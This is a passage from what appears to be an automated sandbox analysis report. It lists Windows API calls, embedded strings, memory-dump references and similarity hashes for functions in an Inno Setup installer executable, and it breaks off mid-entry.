                                                                                                                                        • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                                                                        APIs
                                                                                                                                        • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                                                                        • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2280970139-0
                                                                                                                                        • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                                                        • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                                                                        • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                                                                        • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                                                                        APIs
                                                                                                                                        • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                                                                        • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AllocHandleLockUnlock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2167344118-0
                                                                                                                                        • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                                                        • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                                                                        • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                                                                        • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                                                                        APIs
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                                                                        Strings
                                                                                                                                        • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                                                                        • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                                                        • API String ID: 3535843008-1938159461
                                                                                                                                        • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                                                        • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                                                                        • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                                                                        • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                                                                        • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                                                                        Strings
                                                                                                                                        • Will not restart Windows automatically., xrefs: 004836F6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ActiveForeground
                                                                                                                                        • String ID: Will not restart Windows automatically.
                                                                                                                                        • API String ID: 307657957-4169339592
                                                                                                                                        • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                                                        • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                                                                        • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                                                        • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                                                                        APIs
                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                                                                        • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                                                                        Strings
                                                                                                                                        • Extracting temporary file: , xrefs: 004763EC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileTime$Local
                                                                                                                                        • String ID: Extracting temporary file:
                                                                                                                                        • API String ID: 791338737-4171118009
                                                                                                                                        • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                                                        • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                                                                        • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                                                                        • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                                                                        Strings
                                                                                                                                        • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                                                                        • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                                                                        • API String ID: 0-1974262853
                                                                                                                                        • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                                                        • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                                                                        • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                                                                        • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                                                                        Strings
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                                                                        • %s\%s_is1, xrefs: 00478F10
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                        • API String ID: 47109696-1598650737
                                                                                                                                        • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                                                        • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                                                                        • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                                                                        • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                                                                        APIs
                                                                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                                                                        • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExecuteMessageSendShell
                                                                                                                                        • String ID: open
                                                                                                                                        • API String ID: 812272486-2758837156
                                                                                                                                        • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                                                        • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                                                                        • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                                                                        • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                                                                        APIs
                                                                                                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                                                                        • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                                                                        • String ID: <
                                                                                                                                        • API String ID: 893404051-4251816714
                                                                                                                                        • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                                                        • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                                                                        • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                                                                        • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                                                                        APIs
                                                                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                                                                          • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                                                          • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                                                          • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                                                          • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0223C628,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                        • String ID: )
                                                                                                                                        • API String ID: 2227675388-1084416617
                                                                                                                                        • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                                                                        • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                                                                        • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                                                                        • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window
                                                                                                                                        • String ID: /INITPROCWND=$%x $@
                                                                                                                                        • API String ID: 2353593579-4169826103
                                                                                                                                        • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                                                        • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                                                                        • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                                                                        • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                          • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String$AllocByteCharFreeMultiWide
                                                                                                                                        • String ID: NIL Interface Exception$Unknown Method
                                                                                                                                        • API String ID: 3952431833-1023667238
                                                                                                                                        • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                                                        • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                                                                        • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                                                                        • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                                                                        • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                                                                          • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateErrorHandleLastProcess
                                                                                                                                        • String ID: 0nI
                                                                                                                                        • API String ID: 3798668922-794067871
                                                                                                                                        • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                                                        • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                                                                        • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                                                                        • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$EnumQuery
                                                                                                                                        • String ID: Inno Setup: No Icons
                                                                                                                                        • API String ID: 1576479698-2016326496
                                                                                                                                        • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                                                        • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                                                                        • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                                                        • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                                                                        APIs
                                                                                                                                        • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesErrorFileLast
                                                                                                                                        • String ID: T$H
                                                                                                                                        • API String ID: 1799206407-488339322
                                                                                                                                        • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
